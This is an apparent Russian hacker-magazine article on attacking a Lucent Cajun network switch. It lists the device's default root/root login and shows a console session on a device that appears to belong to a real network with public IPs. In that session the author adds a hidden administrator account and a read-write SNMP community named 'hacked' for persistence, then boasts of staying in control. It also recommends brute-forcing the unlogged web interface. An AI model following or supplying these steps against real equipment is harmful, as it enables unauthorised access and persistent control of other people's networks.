Настольная книга компьютерного исследователя


Исследование сетевого оборудования Lucent Techologies Cajun Switch Agent

 В Рунете, да и на буржуйских сайтах по нетсекурити я не встречал более менее упорядоченного материала по поводу атак на сетевое оборудование… Поэтому я решил восполнить данный пробел…. При написании использовалась часть материалов Default Logins For Network Devices, программой WS_Ping Pro Pack, а также nmap by Feodor/ADM_SNMP_Community_String_Bruteforser.

Описания будут происходить по такому принципу
0)Название/сайт производителя
1)Описание
2)Default paswords
3)SNMP
4)Различные hints/features/bugz замеченные мной, комментарии короче

Итак начнем:

0) Lucent Techologies Cajun Switch Agent:

Я думаю человеку знакомому с сетевыми технологиями не стоит обяснять что такое фирма Lucent… Для тех кто с бронепоезда — www.lucent.com, также допольнительную информацию по свитчу можно получить вот здесь: http://www.cz3.nus.edu.sg/docs/cajun/start.htm

1) Lucent Cajun Switch — свитч поддерживающий технологию Gigabit Ethernet, технологии позволяющей передавать данные по локальной сети со скоростью около 1 гигабита в секунду, и так далее и так далее …

Уважаемый Cajun встретил меня надписью
———————=======================================——————————
Copyright © 1998, All rights reserved by Lucent Technologies Corporation

This software is furnished under a license and may be used in accordance
with the terms of such license and with the inclusion of the above
copyright notice. This software or any other copies thereof may
not be provided or otherwise made available to any other person.
No title to and ownership of the software is hereby transferred.

Contains software developed by:

Epilogue Technology Corporation
Copyright (c) 1988 — 1996 Epilogue Technology Corporation

TEC Technically Elite Concepts, Inc,
Copyright (c) 1994 by Technically Elite Concepts, Inc,
Hermosa Beach, California, U.S.A.

ISI Integrated Systems, Inc.
Copyright 1991 — 1995, Integrated Systems, Inc.

All other trademarks used herein are the property of their respective owners.

Lucent Technologies Cajun Switch Agent v3.0.2
Press Ctrl-P for previous command, Ctrl-N for next command, ? for help.

———————=======================================——————————
Логинимся

Cajun> ?
community SNMP Community configuration
console Console configuration
download TFTP code image download
event Event Table display
exit Exit the application
feprom Flash EPROM configuration
module Module configuration
net Network configuration
nvram Initializes NV RAM — diags run upon reboot
pause Pause for a given number of milliseconds
ping <host> <tries> <delay> <size> <quiet>
port Port configuration
power Power configuration
queuingMode Input/Ouput queuing through fabric and to SMAC ports
reset Reset System
rtc Real Time Clock configuration
setup Setup console IP Address/Mask/Gateway
stack Last saved context display (stack [force])
swPort Switch port configuration
telnet Telnet protocol (telnet <host>)
user User Account configuration
verbose Toggle verbose mode
version Display the software version number
vlan VLAN configuration

Cajun>

lets dance baby ;P

Cajun> user list

 UserID    User Name    Access Type
 ------    ---- ----    -----------
 1         root           ADMINISTRATOR
 2         diag           DIAGNOSTICS
 3         manuf        MANUFACTURING

Cajun> user add

Syntax: user add <userName> <userPassword> <1= READ_ONLY, 2= READ_WRITE, 3=ADMINISTRATOR>

Cajun> user add b00ster dev/ice 3

User Account created successfully.

Cajun> net ip display route_table

Destination     Mask            Next Hop        Device               Source

0.0.0.0         255.0.0.0       0.0.0.0         Self                 Local
10.1.1.1        255.255.255.255 10.1.1.1        Ethernet Management  Local
10.1.1.255      255.255.255.255 255.255.255.255 Ethernet Management  Local
10.1.1.0        255.255.255.0   10.1.1.1        Ethernet Management  Local
127.0.0.0       255.0.0.0       0.0.0.0         Self                 Local
167.206.173.50  255.255.255.255 167.206.173.50  Inband               Local
167.206.173.63  255.255.255.255 255.255.255.255 Inband               Local
167.206.173.48  255.255.255.240 167.206.173.50  Inband               Local
255.255.255.255 255.255.255.255 255.255.255.255 Self                 Local
224.0.0.0       224.0.0.0       0.0.0.0         Self                 Local
0.0.0.0         0.0.0.0         167.206.173.49  Inband               Static

Cajun> net ip display interfaces

Device                Internet Address    Mask          Physical Address  Mode

Ethernet Management   10.1.1.1         255.255.255.0    02-e0-3b-0b-09-06 Up
Inband                167.206.173.50   255.255.255.240  02-e0-3b-0b-09-07 Up
PPP Console Serial    0.0.0.0          0.0.0.0          44-45-53-54-00-00 Down

Cajun> port show all

   Port Status for module 1

                                Auto
                                Neg.   Speed     Duplex
Port Type   Mode   Status       Mode   Status    Status
---- ------ ------ ------------ ------ --------- -----------
1.1  Int    Enable Okay         Disabl 1 Gb/s    Full Duplex

   Port Status for module 2

                                Auto
                                Neg.   Speed     Duplex
Port Type   Mode   Status       Mode   Status    Status
---- ------ ------ ------------ ------ --------- -----------
2.1  Gig    Enable Okay         Disabl 1 Gb/s    Full Duplex
2.2  Gig    Enable Okay         Disabl 1 Gb/s    Full Duplex
2.3  Gig    Enable Okay         Disabl 1 Gb/s    Full Duplex
2.4  Gig    Enable Okay         Disabl 1 Gb/s    Full Duplex

   Port Status for module 3

                                Auto
                                Neg.   Speed     Duplex
Port Type   Mode   Status       Mode   Status    Status
---- ------ ------ ------------ ------ --------- -----------
3.1  Gig    Enable Okay         Disabl 1 Gb/s    Full Duplex
3.2  Gig    Enable Okay         Disabl 1 Gb/s    Full Duplex
3.3  Gig    Enable Okay         Disabl 1 Gb/s    Full Duplex
3.4  Gig    Enable Okay         Disabl 1 Gb/s    Full Duplex

   Port Status for module 4

                                Auto
                                Neg.   Speed     Duplex
Port Type   Mode   Status       Mode   Status    Status
---- ------ ------ ------------ ------ --------- -----------
4.1  Gig    Enable Okay         Disabl 1 Gb/s    Full Duplex
4.2  Gig    Enable No Link      Disabl 1 Gb/s    Full Duplex

   Port Status for module 5

                                Auto
                                Neg.   Speed     Duplex
Port Type   Mode   Status       Mode   Status    Status
---- ------ ------ ------------ ------ --------- -----------
5.1  Gig    Enable Okay         Disabl 1 Gb/s    Full Duplex
5.2  Gig    Enable No Link      Disabl 1 Gb/s    Full Duplex

   Port Status for module 6

                                Auto
                                Neg.   Speed     Duplex
Port Type   Mode   Status       Mode   Status    Status
---- ------ ------ ------------ ------ --------- -----------
6.1  10/100 Enable No Link      Enable Auto Neg. Auto Neg.
6.2  10/100 Enable No Link      Enable Auto Neg. Auto Neg.
6.3  10/100 Enable No Link      Enable Auto Neg. Auto Neg.
6.4  10/100 Enable No Link      Enable Auto Neg. Auto Neg.
6.5  10/100 Enable No Link      Enable Auto Neg. Auto Neg.
6.6  10/100 Enable No Link      Enable Auto Neg. Auto Neg.
6.7  10/100 Enable No Link      Enable Auto Neg. Auto Neg.
6.8  10/100 Enable No Link      Enable Auto Neg. Auto Neg.
6.9  10/100 Enable No Link      Enable Auto Neg. Auto Neg.
6.10 10/100 Enable No Link      Enable Auto Neg. Auto Neg.
6.11 10/100 Enable No Link      Enable Auto Neg. Auto Neg.
6.12 10/100 Enable No Link      Enable Auto Neg. Auto Neg.
6.13 10/100 Enable No Link      Enable Auto Neg. Auto Neg.
6.14 10/100 Enable No Link      Enable Auto Neg. Auto Neg.
6.15 10/100 Enable No Link      Enable Auto Neg. Auto Neg.
6.16 10/100 Enable No Link      Enable Auto Neg. Auto Neg.
6.17 10/100 Enable No Link      Enable Auto Neg. Auto Neg.
6.18 10/100 Enable No Link      Enable Auto Neg. Auto Neg.
6.19 10/100 Enable No Link      Enable Auto Neg. Auto Neg.
6.20 10/100 Enable Okay         Enable 10 Mb/s   Half Duplex

Cajun>

2) Дефолтов на самом деле не очень много… по крайней мере те которые я встретил..

            логин         группа                        пароль

 1         root           ADMINISTRATOR          root
 2         diag           DIAGNOSTICS             ?
 3         manuf        MANUFACTURING         ?

На diag/manuf я так и не смог найти соответствующей информации…

3) SNMP

Cajun> community display all

Index String               IP Address      Access Security Traps Status
----- -------------------- --------------- ------ -------- ----- ------
1     public               ***.***.***.***  RO     NORM     F     A

Соответственно:

Cajun> community add hacked ***.***.***.*** 3 2 0
Create Succeeded.
Cajun> community display all

Index String               IP Address      Access Security Traps Status
----- -------------------- --------------- ------ -------- ----- ------
1     public               ***.***.***.***  RO     NORM     F     A
2     hacked             ***.***.***.***  RW     ADMIN    F     A

Что называется чувствуете разницу? вот вот….
Правда полазив по MIB’ам ничего уж СВЕРХ секретного я не нашел, кроме возможности изменять файлы конфигурации… Мне это особо интересным не показалось на самом деле… и то может быть потому что я был god на этом свитче и наверно на нем так и останусь.

4) Особых багов я не нарулил, и то наверно потому, что мне было влом ковырятся :P
Особое нарекание вызывает web-интерфейс, который прикручен к сей железке.. С помощью брутфорса можно попытатся подобрать пароли, благо логи не ведутся.



©2015 Журнал Хакера Entries (RSS) and Comments (RSS)